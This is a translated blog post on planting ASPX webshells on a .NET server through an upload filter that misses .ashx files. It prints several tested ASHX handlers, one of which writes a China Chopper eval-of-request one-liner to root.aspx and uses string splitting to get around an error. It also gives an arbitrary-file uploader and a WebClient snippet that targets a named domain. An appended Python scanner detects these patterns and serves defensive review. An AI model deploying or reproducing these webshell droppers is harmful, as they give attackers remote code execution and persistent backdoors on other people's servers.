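.NET environment; the upload function did not restrict Ashx and Asmx. The latter could not run after upload, with a message that Asmx scripts can only be run locally, so I planned to upload an Ashx script first and then generate an Aspx file in the current directory (the target cannot execute Asp files). I found the following Ashx code online: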
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";
        StreamWriter file1 = File.CreateText(context.Server.MapPath("root.aspx"));
        file1.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>");
        file1.Flush();
        file1.Close();
    }
    public bool IsReusable {
        get {
            return false;
        }
    }
}
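I changed the Asp one-liner in the script to the Chopper (菜刀) Aspx one-liner, but it threw an error when executed, saying unknown directive @Page. So I solved it in the following 2 ways: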
1. Build the string by String concatenation
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
    public void ProcessRequest(HttpContext context) {
        context.Response.ContentType = "text/plain";
        string show = "<%@ Page Language=\"Jscript\"%" + "><%eval(Request.Item" + "[\"chopper\"]" + ",\"unsafe\");%>";
        StreamWriter file1 = File.CreateText(context.Server.MapPath("root.aspx"));
        file1.Write(show);
        file1.Flush();
        file1.Close();
    }
    public bool IsReusable {
        get {
            return false;
        }
    }
}
2. A clumsier method; see the code
<%@ WebHandler Language="C#" Class="Uploader" %>
using System;
using System.IO;
using System.Web;
public class Uploader : IHttpHandler
{
    public void ProcessRequest(HttpContext hc)
    {
        foreach (string fileKey in hc.Request.Files)
        {
            HttpPostedFile file = hc.Request.Files[fileKey];
            file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
        }
    }
    public bool IsReusable
    {
        get { return true; }
    }
}
Then create a WinForm program in VS and write the following in the main function:
System.Net.WebClient myWebClient = new System.Net.WebClient();
myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");
Run it and that is all. All of the above methods were tested successfully.
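For review of a web root, the following added example (not part of the original post) shows why a plain substring signature misses the concatenated variant and how joining adjacent string literals before matching catches it. The rule names, sample strings and function names are assumptions constructed for illustration.

```python
import re

# Adjacent C# string literals joined by "+" ("abc" + "def"); removing the join
# undoes the literal-splitting used in the first variant above.
_CONCAT = re.compile(r'"\s*\+\s*"')

# Hypothetical rule names; patterns run on normalized (lower-case, no whitespace) text.
RULES = {
    "jscript-eval-of-request": re.compile(r'eval\(request\.item\[.{1,80}?\],\\?"unsafe\\?"\)'),
    "writes-script-file": re.compile(r'(createtext|writealltext)\(.{0,120}?\.(aspx|ashx|asmx)'),
    "saves-upload-under-client-name": re.compile(r'saveas\(.{0,160}?\.filename'),
}

def normalize(source):
    joined = _CONCAT.sub("", source)
    return re.sub(r"\s+", "", joined).lower()

def naive_hit(source):
    """Plain substring signature, shown for comparison."""
    return "eval(Request.Item[" in source

def scan(source):
    text = normalize(source)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed samples, modelled on the handlers quoted in this article.
SPLIT_WRITER = r'''
string show = "<%@ Page Language=\"Jscript\"%" + "><%eval(Request.Item" + "[\"chopper\"]" + ",\"unsafe\");%>";
StreamWriter file1 = File.CreateText(context.Server.MapPath("root.aspx"));
file1.Write(show);
'''
UPLOADER = r'''
HttpPostedFile file = hc.Request.Files[fileKey];
file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
'''
BENIGN = r'''
StreamWriter log = File.CreateText(context.Server.MapPath("~/App_Data/report.txt"));
log.Write("ok");
'''

if __name__ == "__main__":
    for name, src in [("split_writer", SPLIT_WRITER), ("uploader", UPLOADER), ("benign", BENIGN)]:
        print(name, "naive:", naive_hit(src), "rules:", scan(src))
```

A hit is a prompt for manual review, not a verdict: legitimate upload handlers can also call SaveAs with the client-supplied file name.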
When reposting, please credit: IT运维空间 » Security Protection » Exposing Hackers: A Summary of Methods for Writing aspx Trojans with Ashx Scripts